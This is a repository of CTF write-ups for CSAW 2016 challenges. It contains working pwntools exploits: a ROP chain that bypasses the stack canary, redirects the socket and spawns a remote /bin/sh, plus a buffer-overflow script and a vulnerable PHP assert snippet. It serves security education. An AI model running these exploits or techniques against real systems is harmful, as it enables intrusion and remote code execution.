├── 2016
    └── CSAW
    │   ├── Fuzyll
    │       ├── README.md
    │       └── images
    │       │   ├── description.png
    │       │   ├── encoding.png
    │       │   ├── fuzyllblog.png
    │       │   ├── jade.png
    │       │   ├── linkedin.png
    │       │   ├── part2.png
    │       │   ├── smash4.png
    │       │   └── wow.png
    │   ├── Tutorial
    │       ├── .gdb_history
    │       ├── README.md
    │       ├── images
    │       │   ├── canary.png
    │       │   ├── description.png
    │       │   ├── first_run.png
    │       │   ├── flag.png
    │       │   ├── func1.png
    │       │   ├── func2.png
    │       │   ├── gdb.png
    │       │   ├── ida1.png
    │       │   ├── menu.png
    │       │   ├── r2.png
    │       │   └── shell1.png
    │       ├── libc-2.19.so
    │       ├── tutorial
    │       └── tutorial.py
    │   ├── Warmup
    │       ├── README.md
    │       ├── images
    │       │   ├── description.png
    │       │   ├── easy.png
    │       │   ├── flag.png
    │       │   ├── main.png
    │       │   └── test.png
    │       ├── warmup
    │       └── warmupsol.py
    │   └── mfw
    │       ├── README.md
    │       ├── images
    │           ├── about.png
    │           ├── description.png
    │           ├── flag.png
    │           ├── git.png
    │           └── website.png
    │       └── index.php
├── 2017
    ├── BKP
    │   └── vimjail
    │   │   ├── README.md
    │   │   └── images
    │   │       ├── description.png
    │   │       ├── flag.png
    │   │       └── rbash.png
    ├── BackdoorCTF
    │   └── The-Wall
    │   │   ├── README.md
    │   │   ├── The Wall.html
    │   │   ├── images
    │   │       ├── description.png
    │   │       └── page.png
    │   │   ├── source.php
    │   │   └── the-wall.py
    ├── CSAW
    │   └── tableEz
    │   │   ├── README.md
    │   │   ├── images
    │   │       ├── description.png
    │   │       ├── get_tbl_entry.png
    │   │       ├── get_tbl_entry_dasm.png
    │   │       ├── main.png
    │   │       ├── string_info.png
    │   │       └── table.png
    │   │   └── tablez
    └── HackDatKiwi
    │   └── MD5 Games 1
    │       ├── README.md
    │       ├── hdk_md5.html
    │       └── sol.php
├── 2018
    └── Insomni'hack teaser
    │   ├── Rule86
    │       ├── README.md
    │       ├── images
    │       │   ├── description.png
    │       │   ├── flag.png
    │       │   └── hint.gif
    │       ├── outputs
    │       │   ├── hint.gif
    │       │   ├── hint_partial.gif
    │       │   ├── rule86.txt
    │       │   ├── rule86_partial.txt
    │       │   ├── super_cipher.py
    │       │   └── super_cipher_partial.py
    │       ├── sample_files
    │       │   ├── hint.gif.enc
    │       │   ├── rule86.txt
    │       │   ├── rule86.txt.enc
    │       │   └── super_cipher.py.enc
    │       └── sol.py
    │   └── VulnShop
    │       ├── README.md
    │       ├── images
    │           ├── description.png
    │           ├── disabled.png
    │           ├── index.png
    │           └── output.png
    │       └── source
    │           └── vulnshop.teaser.insomnihack.ch
    │               ├── index.html
    │               ├── index1380.html
    │               ├── index2b4c.html
    │               ├── index32da.html
    │               ├── index84f6.html
    │               ├── index8a5f.html
    │               └── phpinfo.html
├── LICENSE
└── README.md


/2016/CSAW/Fuzyll/README.md:
--------------------------------------------------------------------------------
  1 | ![description](images/description.png)
  2 | 
  3 | Stage 1: http://fuzyll.com/files/csaw2016/start
  4 | This site gives the hint:
  5 | CSAW 2016 FUZYLL RECON PART 1 OF ?: People actually liked last year's challenge, so CSAW made me do it again... Same format as last year, new stuff you need to look up. The next part is at /csaw2016/<the form of colorblindness I have>.
  6 | 
  7 | For this stage I googled "fuzyll color blind" and found fuzyll's blog where he says he has Deuteranomaly:
  8 | ![fuzyll blog](images/fuzyllblog.png)
  9 | 
 10 | Stage 2: http://fuzyll.com/files/csaw2016/deuteranomaly
 11 | ![part 2](images/part2.png)
 12 | This page presents us with a picture of strawberries, looking at the exif data tells us the next stage.
 13 | 
 14 | Stage 3:
 15 | CSAW 2016 FUZYLL RECON PART 2 OF ?: No, strawberries don't look exactly like this, but it's reasonably close. You know what else I can't see well? /csaw2016/&lt;the first defcon finals challenge i ever scored points on
 16 | 
 17 | Googling "fuzyll linkedin" will find his linkedin page, which lists which defcons he has competed in.
 18 | The earliest on the list was defcon 19
 19 | ![fuzyll linkedin](images/linkedin.png)
 20 | 
 21 | To see if I could find which challenges he did, I googled "fuzyll defcon challenges" which brought me to a vm of defcon challenges he compiled:
 22 | http://fuzyll.com/2016/the-defcon-ctf-vm/
 23 | 
 24 | The github page has challenges sorted by year, after trying all the challenge names for defcon 19, I found that 'tomato' was the solution
 25 | 
 26 | Stage 4: http://fuzyll.com/files/csaw2016/tomato
 27 | 
 28 | This page presents us with the text:
 29 | ÃâÁæ@òðñö@ÆäéèÓÓ@ÙÅÃÖÕ@×ÁÙã@ó@–†@oz@É@„–•}£@…¥…•@“‰’…@£–”£–…¢Z@Á•¨¦¨k@–¤£¢‰„…@–†@ÃãÆ¢k@É}¥…@‚……•@—“¨‰•‡@@†‰™@”–¤•£@–†@æ–™“„@–†@恙ف†£@–¥…™@£ˆ…@—¢£@¨…™@M•…¥…™@£ˆ–¤‡ˆ£@É}„@‚…@¢¨‰•‡@£ˆ£@†£…™@Á£ƒ“¨¢”k@‚¤£@ˆ…™…@¦…@™…]K@㈅@•…§£@—™£@‰¢@£@aƒ¢¦òðñöaL”¨@”‰•@æ–æ@ƒˆ™ƒ£…™}¢@•”…nK
 30 | 
 31 | I assumed this was some sort of weird encoding, so I looked for encoding detectors online and found the "Universal Cyrillic decoder":
 32 | ![encoding detector](images/encoding.png)
 33 | looking through all of their possible encodings revealed the solution.
 34 | 
 35 | Stage 5:
 36 | CSAW 2016 FUZYLL RECON PART 3 of ?: I don't even like tomatoes! Anyway, outside of CTFs, I've been playing a fair amount of World of WarCraft over the past year (never thought I'd be saying that after Cataclysm, but here we are). The next part is at /csaw2016/<my main WoW character's name>.
 37 | 
 38 | Googling "fuzyll world of warcraft" found this site on his blog:
 39 | http://fuzyll.com/2015/blackfathom-deep-dish/
 40 | 
 41 | I found this guild on the WoW armory, and sorted the roster by rank, the guild master is "elmrik", which is the solution to this stage.
 42 | 
 43 | Stage 6:
 44 | The page gives us some ruby code:
 45 | ~~~~
 46 | #!/usr/bin/env ruby
 47 | 
 48 | CHARS = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "B", "C", "D",
 49 |          "F", "G", "H", "J", "K", "L", "M", "N", "P", "Q", "R", "S", "T",
 50 |          "V", "W", "X", "Y", "Z", "b", "c", "d", "f", "g", "h", "j", "k",
 51 |          "l", "m", "n", "p", "q", "r", "s", "t", "v", "w", "x", "y", "z"]
 52 | 
 53 | def encode(string)
 54 |     input = string.bytes.inject {|x, y| (x << 8) + y }
 55 |     output = ""
 56 |     while input > 0
 57 |         output = CHARS[input % 52].to_s + output
 58 |         input /= 52
 59 |     end
 60 |     return output
 61 | end
 62 | 
 63 | def decode(input)
 64 |     # your implementation here
 65 | end
 66 | 
 67 | message = "JQSX2NBDykrDZ1ZHjb0BJt5RWFkcjHnsXvCQ4LL9H7zhRrvVZgLbm2gnXZq71Yr6T14tXNZwR1Dld2Y7M0nJsjgvhWdnhBll5B8w0VP3DFDjd3ZQBlcV4nkcFXBNzdPCSGMXQnQ7FTwcwbkG6RHX7kFHkpvgGDDGJvSDSTx7J6MFhRmTS2pJxZCtys4yw54RtK7nhyW6tnGmMs1f4pW6HzbCS1rSYNBk3PxzW9R1kJK54R2b7syLXd7x1Mr8GkMsg4bs3SGmj3rddVqDf4mTYq1G3yX1Rk9gJbj919Jw42zDtT2Jzz4gN0ZBmXPsBY9ktCLPdFrCPZ33NKJy5m37PK0GLXBxZz9k0cjzyt8x199jMsq7xrvNNgDNvgTbZ0xjZzHhkmrWrCmD7t4q4rWYFSJd4MZBxvnqc0VgGzdkq8jSJjnwcynq9VfH22WCQSdPKw48NkZL7QKGCT94pSb7ZSl2G6W37vBlW38q0hYDVcXTTDwr0l808nDPF6Ct1fPwKdNGKbRZ3Q3lHKMCYBC3w8l9VRjcHwMb1s5sMXM0xBvF8WnWn7JVZgPcXcwM2mDdfVkZsFzkrvVQmPfVNNdk9L5WtwDD8Wp9SDKLZBXY67QkVgW1HQ7PxnbkRdbnQJ4h7KFM2YnGksPvH4PgW2qcvmWcBz62xDT5R6FXJf49LPCKL8MQJLrxJpQb7jfDw0fTd00dX1KNvZsWmfYSTl1GxPlz1PvPSqMTQ036FxSmGb6k42vrzz2X90610Z"
 68 | puts decode(message)
 69 | ~~~~
 70 | 
 71 | The encode method keeps a running sum of each char, shifting the sum to the left 8 bits before each add.
 72 | the sum is then looped over, creating a string from the CHARS array
 73 | 
 74 | My script to decode it:
 75 | ~~~~
 76 | def decode(input)
 77 |     index = 0
 78 |     output = CHARS.index(input[0])
 79 | 
 80 |     while index < input.length
 81 |         char = input[index]
 82 |         output *= 52
 83 |         output += CHARS.index(input[index])
 84 |         index += 1
 85 |     end
 86 | 
 87 |     index = 0
 88 |     final = ""
 89 |     while true
 90 |         final = ((output >> 8 * index) & 0xFF).chr + final
 91 |         output -= (output >> 8 * index) & 0xFF
 92 |         if (output >> (8 *index)) <= 0
 93 |             return final
 94 |         end
 95 |         index += 1
 96 |     end
 97 |     return final
 98 |     # your implementation here
 99 | end
100 | ~~~~
101 | 
102 | This doesn't work completely, but it works well enough to get to the next stage.
103 | 
104 | Stage 7:
105 | On stream, after one of these big upsets in Smash 4, you can see me in the crowd with a shirt displaying my main character! The next part is at /csaw2016/<the winning player's tag>.
106 | 
107 | I googled "Biggest smash 4 upsets" and found a video, and just tried the tags of all the players in it, the answer is jade
108 | ![smash 4 video](images/smash4.png)
109 | 
110 | Stage 8: http://fuzyll.com/files/csaw2016/jade
111 | This page sends you a file called "jade".
112 | Running 'file' on it says that it's gzipped, gunzipping it gives you an image.
113 | Checking the exif data on the image brings you to the next stage.
114 | ![jade](images/jade.png)
115 | 
116 | Stage 9:
117 | CSAW 2016 FUZYLL RECON PART 5 OF 6: I haven't spent the entire year playing video games, though. This past March, I spent time completely away from computers in Peru. This shot is from one of the more memorable stops along my hike to Machu Picchu. To make things easier on you, use only ASCII: /csaw2016/<the name of these ruins>.
118 | 
119 | google image search says that the image is of Winay Wayna
120 | 
121 | Stage 10: http://fuzyll.com/files/csaw2016/winaywayna
122 | This page gives us the flag:
123 | CSAW 2016 FUZYLL RECON PART 6 OF 6: Congratulations! Here's your flag{WH4T_4_L0NG_4ND_STR4NG3_TRIP_IT_H45_B33N}.
124 | 


--------------------------------------------------------------------------------
/2016/CSAW/Fuzyll/images/description.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Fuzyll/images/description.png


--------------------------------------------------------------------------------
/2016/CSAW/Fuzyll/images/encoding.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Fuzyll/images/encoding.png


--------------------------------------------------------------------------------
/2016/CSAW/Fuzyll/images/fuzyllblog.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Fuzyll/images/fuzyllblog.png


--------------------------------------------------------------------------------
/2016/CSAW/Fuzyll/images/jade.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Fuzyll/images/jade.png


--------------------------------------------------------------------------------
/2016/CSAW/Fuzyll/images/linkedin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Fuzyll/images/linkedin.png


--------------------------------------------------------------------------------
/2016/CSAW/Fuzyll/images/part2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Fuzyll/images/part2.png


--------------------------------------------------------------------------------
/2016/CSAW/Fuzyll/images/smash4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Fuzyll/images/smash4.png


--------------------------------------------------------------------------------
/2016/CSAW/Fuzyll/images/wow.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Fuzyll/images/wow.png


--------------------------------------------------------------------------------
/2016/CSAW/Tutorial/.gdb_history:
--------------------------------------------------------------------------------
 1 | info process
 2 | info proc
 3 | proc info
 4 | quit
 5 | r
 6 | r 8000
 7 | b menu
 8 | r 8000
 9 | quit
10 | r 8001
11 | quit
12 | r 8002
13 | b menu
14 | r 8003
15 | proc info
16 | info proc
17 | shell ls -al /proc/4169/fd
18 | 


--------------------------------------------------------------------------------
/2016/CSAW/Tutorial/README.md:
--------------------------------------------------------------------------------
  1 | ![description](images/description.png)
  2 | 
  3 | This challenge provides an executable and a libc.so file.
  4 | 
  5 | Running this file causes a segfault, so lets look at it in IDA:
  6 | 
  7 | ![First ida view](images/ida1.png)
  8 | 
  9 | The file expects us to pass an argument designating the port number to listen on.
 10 | 
 11 | running the program with argument 8000 will still have some errors: to get it working fully you have to fix the errors that it lists (making a user named tutorial, making a home directory for the user, etc)
 12 | 
 13 | Once this setup is done, we can run the program locally for testing.
 14 | I could only get the program to run as root (probably not the safest thing to do, but I didn't feel like fixing the permission errors I was getting)
 15 | 
 16 | running sudo ./tutorial 8001 in one terminal then nc 127.0.0.1 8001 in another terminal lets us connect to the service:
 17 | ![first run](images/first_run.png)
 18 | 
 19 | There are 3 menu options:
 20 | 
 21 | 1. Manual: this prints some address out, if this is a leak in libc, we can use this address and the given libc to get the address of anything in libc
 22 | 
 23 | 2. This prompts you to enter your exploit, this is probably where we should look for a vulnerability
 24 | 
 25 | 3. Quit: quits the program
 26 | 
 27 | At this point, I decided to look at the 'menu' function from the binary in IDA:
 28 | ![menu function in IDA](images/menu.png)
 29 | 
 30 | We can see that func2 is called if '2' is input at the menu, and func1 is called if '1' is input.
 31 | 
 32 | Lets see what option 1 does:
 33 | ![func1 in IDA](images/func1.png)
 34 | 
 35 | Here we can see that the function gets the address of the symbol "puts" in the current process, and prints this address - 1280.
 36 | 
 37 | Since we now know the address of puts in memory, we can get around ASLR to find the address of anything in libc:
 38 | address of thing in process = leaked address + 1280 - offset of puts + offset of thing we're finding in libc
 39 | 
 40 | To find offsets of a symbol in libc, you can open the given libc file in ida; its address in ida is its offset.
 41 | 
 42 | Now lets look at func2:
 43 | ![func2 in IDA](images/func2.png)
 44 | 
 45 | This function has a clear buffer overflow: it reads 0x1cc bytes of input into a buffer at [bp - 140h]
 46 | 
 47 | The only thing in the way of a buffer overflow exploit is the stack canary:
 48 | ![stack canary](images/canary.png)
 49 | 
 50 | Looking at the disassembly shows us that the stack canary is found at ebp - 8
 51 | In order to succesfully exploit the system, we need to find the stack canary's value and include it at the right place in our exploit so that it is not modified by our buffer overflow
 52 | 
 53 | Luckily for us, the stack canary is printed by the write() call at the end of the function. (It outputs 0x144 bytes starting at bp - 0x140, the canary is found at bp - 8)
 54 | 
 55 | So we can simply enter nothing as input to func 2, read the stack canary from the output, and then call func2 again with our real exploit.
 56 | 
 57 | The Exploit:
 58 | In order to exploit this vulnerability, we will need to use ROP.
 59 | We can get the address of system() using the leaked memory address and offsets from libc-2.19.so 
 60 | We can also get the address of the string "/bin/sh" found libc-2.19.so.
 61 | If we can load "/bin/sh" into rdi, then return to system(), we can get a shell on the server.
 62 | 
 63 | The easiest way to get "/bin/sh" into rdi is to include its address into our input, then pop it into rdi using a rop gadget. To find gadgets for this exploit, I used radare2:
 64 | ![finding gadget in radare](images/r2.png)
 65 | 
 66 | If we overwrite the return address (rbp + 8) with the address of this gadget, put the address of "/bin/sh" in rbp + 16, and put the address of system into rbp + 24, func2 will return to the gadget, pop
 67 | "/bin/sh" into rdi, then return into system, executing /bin/sh.
 68 | 
 69 | The exploit now looks like this:
 70 | "A" * (0x140 - 8) + stack canary + [8 bytes of filler] + pop_rdi_ret_gadget + bin_sh + system
 71 | 
 72 | Writing up this exploit spawns a shell from the service, but we can't interact with it. This is because system connects the input and output of /bin/sh to file descriptors 0 and 1 respectively, of the parent process. Since we are passing input and output through a different file descriptor (for the socket being used), we can't interact with the shell we launched.
 73 | 
 74 | In order to interact with the shell we create, we need to replace file descriptors 0 and 1 with the descriptor for the socket we're communicating through.
 75 | 
 76 | To do this, we must call close(0) and close(1) to close the file descriptors for stdin and stdout
 77 | We can then call dup(socket fd) twice to create file descriptors 0 and 1 that use our socket.
 78 | 
 79 | We can get the address of close and dup the same way we got the addresses of the other libc functions.
 80 | 
 81 | To find the socket being used, I launched the program in gdb, then looked at its open file descriptors in /proc/\<pid\>/fd/
 82 | ![gdb output](images/gdb.png)
 83 | To do this, simply set a breakpoint anywhere after the socket is created, and look at its file descriptors.
 84 | 
 85 | We can see from /proc/\<pid\>/fd that the socket has file descriptor 4.
 86 | 
 87 | Now our exploit looks like this:
 88 | 
 89 | (0x140 - 8) bytes of filler + stack_canary + 8 bytes of filler + pop_rdi_ret gadget + 0 + address of close + pop_rdi_ret gadget + 1 + address of close + pop_rdi_ret gadget + socket_fd number + address of dup + address of dup + pop_rdi_ret address + bin_sh address + system address
 90 | 
 91 | This will bypass the stack canary, call close(0), call close(1), call dup(4) twice, then call system("/bin/sh")
 92 | 
 93 | An example of the final exploit can be found in tutorial.py
 94 | 
 95 | ![running the exploit](images/flag.png)
 96 | 
 97 | And we're done!
 98 | Flag : FLAG{3ASY_R0P_R0P_P0P_P0P_YUM_YUM_CHUM_CHUM}
 99 | 
100 | 


--------------------------------------------------------------------------------
/2016/CSAW/Tutorial/images/canary.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Tutorial/images/canary.png


--------------------------------------------------------------------------------
/2016/CSAW/Tutorial/images/description.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Tutorial/images/description.png


--------------------------------------------------------------------------------
/2016/CSAW/Tutorial/images/first_run.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Tutorial/images/first_run.png


--------------------------------------------------------------------------------
/2016/CSAW/Tutorial/images/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Tutorial/images/flag.png


--------------------------------------------------------------------------------
/2016/CSAW/Tutorial/images/func1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Tutorial/images/func1.png


--------------------------------------------------------------------------------
/2016/CSAW/Tutorial/images/func2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Tutorial/images/func2.png


--------------------------------------------------------------------------------
/2016/CSAW/Tutorial/images/gdb.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Tutorial/images/gdb.png


--------------------------------------------------------------------------------
/2016/CSAW/Tutorial/images/ida1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Tutorial/images/ida1.png


--------------------------------------------------------------------------------
/2016/CSAW/Tutorial/images/menu.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Tutorial/images/menu.png


--------------------------------------------------------------------------------
/2016/CSAW/Tutorial/images/r2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Tutorial/images/r2.png


--------------------------------------------------------------------------------
/2016/CSAW/Tutorial/images/shell1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Tutorial/images/shell1.png


--------------------------------------------------------------------------------
/2016/CSAW/Tutorial/libc-2.19.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Tutorial/libc-2.19.so


--------------------------------------------------------------------------------
/2016/CSAW/Tutorial/tutorial:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Tutorial/tutorial


--------------------------------------------------------------------------------
/2016/CSAW/Tutorial/tutorial.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | from pwn import *
 4 | 
 5 | #for switching between local use and remote use
 6 | 
 7 | libcname = 'libc-2.19.so' #the libc that was given
 8 | #libcname = 'libc-2.23.so'  #my libc for testing
 9 | 
10 | 
11 | if libcname == 'libc-2.19.so':
12 |     r = remote('pwn.chal.csaw.io', 8002)
13 |     libc = ELF(libcname)
14 |     #get offsets of various symbols in libc-2.19.so
15 |     libc_puts_addr = libc.symbols['puts']
16 |     libc_system_addr = libc.symbols['system']
17 |     libc_bin_sh = next(libc.search('/bin/sh\x00'))
18 |     libc_close = libc.symbols['close']
19 |     libc_fcntl = libc.symbols['fcntl']
20 |     libc_dup = libc.symbols['dup']
21 | 
22 | else:
23 |     r = remote('127.0.0.1', 8003)
24 |     #pwntools wouldnt handle my libc for some reason, so i just manually got the addresses from ida
25 |     libc_puts_addr = 0x6F5D0
26 |     libc_system_addr = 0x45380
27 |     libc_bin_sh = 0x18C58B
28 |     libc_close = 0xF7030
29 |     libc_fcntl = 0xF6DF0
30 |     libc_dup = 0x0F7090
31 | 
32 | #use the 'manual' option in the menu
33 | r.sendline('1')
34 | 
35 | msg = r.recvline()
36 | 
37 | while 'Reference' not in msg:
38 |     msg = r.recvline()
39 | 
40 | #get address of puts - 1280
41 | leaked_addr = int(msg[msg.index(':') + 1: msg.index('\n')], 16)
42 | #calculate the base of libc in the process from leaked address
43 | libc_base = leaked_addr + 1280 - libc_puts_addr
44 | 
45 | #calculate locations of symbols in the process form libc base and offset
46 | real_sys_addr = libc_base + libc_system_addr
47 | real_close_addr = libc_base + libc_close
48 | real_dup_addr = libc_base + libc_dup
49 | bin_sh_addr = libc_base + libc_bin_sh
50 | 
51 | #address of the pop rdi; ret gadget
52 | pop_rdi_ret = 0x004012e3
53 | 
54 | #call func2 with no input, to leak the stack canary
55 | finalstr = "2\n"
56 | r.sendline(finalstr)
57 | 
58 | #print some of the responses for debugging purposes
59 | response = r.recv()
60 | print(response)
61 | response = r.recv()
62 | print(response)
63 | response = r.recv()
64 | print(response)
65 | 
66 | #get the contents of the stack canary from the output
67 | stack_canary = response[response.index('-Tut') - 12:response.index('-Tut')-4]
68 | print(stack_canary)
69 | 
70 | #pack the stack canary for use in the exploit
71 | stack_canary = u64(stack_canary)
72 | 
73 | #incomplete exploit, does not replace stdin and stdout
74 | #finalstr = "2\n" + "A" * (0x140 - 8) + p64(stack_canary) + "AAAAAAAA" + p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(real_sys_addr)
75 | 
76 | #full exploit, as described in README.md
77 | finalstr = "2\n" + "A" * (0x140 - 8) + p64(stack_canary) + "AAAAAAAA" + p64(pop_rdi_ret) + p64(0) + p64(real_close_addr) + p64(pop_rdi_ret) + p64(1) + p64(real_close_addr) + p64(pop_rdi_ret) + p64(4) + p64(real_dup_addr) + p64(real_dup_addr) + p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(real_sys_addr)
78 | print finalstr
79 | 
80 | #send the exploit
81 | r.sendline(finalstr)
82 | 
83 | #switch to interactive shell
84 | r.interactive()
85 | 
86 | 


--------------------------------------------------------------------------------
/2016/CSAW/Warmup/README.md:
--------------------------------------------------------------------------------
 1 | ![description](images/description.png)
 2 | 
 3 | The challenge provides us with a binary "warmup".
 4 | Running this binary prints a hex value, then takes user input.
 5 | ![program test](images/test.png)
 6 | 
 7 | Opening it in ida shows that it is printing the address of some symbol named "easy":
 8 | ![main in ida](images/main.png)
 9 | 
10 | Lets see what this 'easy' symbol is:
11 | ![easy](images/easy.png)
12 | 
13 | The function 'easy' simply prints out the flag to us.
14 | 
15 | Looking back at the main method, the part that takes in user input is vulnerable to buffer overflow.
16 | The buffer that it writes into is located at [bp - 40h], so anything past 0x40 bytes will overwrite other info.
17 | 
18 | If you are not familiar with the x86 stack frame layout, http://eli.thegreenplace.net/2011/09/06/stack-frame-layout-on-x86-64 has some good diagrams.
19 | In short, the return address of our current function is stored at RBP + 8. If we overwrite this 
20 | return address with the address of 'easy', the main function will return into easy, and will print
21 | the flag for us.
22 | 
23 | I threw together a quick python script to run this exploit:
24 | ~~~
25 | #pwntools provides many tools for exploitation challenges
26 | from pwn import *
27 | 
28 | #establish a connection to the server running the "warmup" binary
29 | r = remote('pwn.chal.csaw.io', 8000)
30 | 
31 | #receive the first message, which containts the address of 'easy'
32 | msg = r.recv()
33 | lines = msg.split('\n')
34 | 
35 | #slice the second line of the server message to get the address it sent and convert it to an integer
36 | address = int(lines[1][4:],16)
37 | 
38 | #sends enough A's to fill the buffer up to the location of the return address, followed by the address of 'easy' that was leaked to us earlier
39 | r.sendline("A" * (0x40 + 8) + p64(address))
40 | 
41 | #print the server response
42 | print(r.recv())
43 | ~~~
44 | Running this gives the flag:
45 | ![flag](images/flag.png)
46 | 
47 | 
48 | 


--------------------------------------------------------------------------------
/2016/CSAW/Warmup/images/description.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Warmup/images/description.png


--------------------------------------------------------------------------------
/2016/CSAW/Warmup/images/easy.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Warmup/images/easy.png


--------------------------------------------------------------------------------
/2016/CSAW/Warmup/images/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Warmup/images/flag.png


--------------------------------------------------------------------------------
/2016/CSAW/Warmup/images/main.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Warmup/images/main.png


--------------------------------------------------------------------------------
/2016/CSAW/Warmup/images/test.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Warmup/images/test.png


--------------------------------------------------------------------------------
/2016/CSAW/Warmup/warmup:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/Warmup/warmup


--------------------------------------------------------------------------------
/2016/CSAW/Warmup/warmupsol.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | r = remote('pwn.chal.csaw.io', 8000)
 4 | 
 5 | msg = r.recv()
 6 | lines = msg.split('\n')
 7 | address = int(lines[1][4:],16)
 8 | 
 9 | r.sendline("A" * (0x40 + 8) + p64(address))
10 | print(r.recv())
11 | 


--------------------------------------------------------------------------------
/2016/CSAW/mfw/README.md:
--------------------------------------------------------------------------------
 1 | ![description](images/description.png)
 2 | 
 3 | The challenge contains a link to a website:
 4 | ![site index](images/website.png)
 5 | 
 6 | Going to the about tab reveals that the site uses PHP and git.
 7 | ![about page](images/about.png)
 8 | 
 9 | The server has it's git directory public available:
10 | ![git directory](images/git.png)
11 | 
12 | I used https://github.com/evilpacket/DVCS-Pillage to download the git directory contents:
13 | 
14 | `./gitpillage.sh http web.chal.csaw.io:8000/`
15 | 
16 | This gives access to the source of index.php:
17 | ~~~~
18 | <?php
19 | 
20 | if (isset($_GET['page'])) {
21 | 	$page = $_GET['page'];
22 | } else {
23 | 	$page = "home";
24 | }
25 | 
26 | $file = "templates/" . $page . ".php";
27 | 
28 | // I heard '..' is dangerous!
29 | assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
30 | 
31 | // TODO: Make this look nice
32 | assert("file_exists('$file')") or die("That file doesn't exist!");
33 | 
34 | ?>
35 | <!DOCTYPE html>
36 | <html>
37 | 	<head>
38 | 
39 |         [irrelevant html stuff]...
40 | 
41 | 		<div class="container" style="margin-top: 50px">
42 | 			<?php
43 | 				require_once $file;
44 | 			?>
45 | 			
46 | 		</div>
47 | 		
48 | 		<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js" />
49 | 		<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js" />
50 | 	</body>
51 | </html>
52 | ~~~~
53 | 
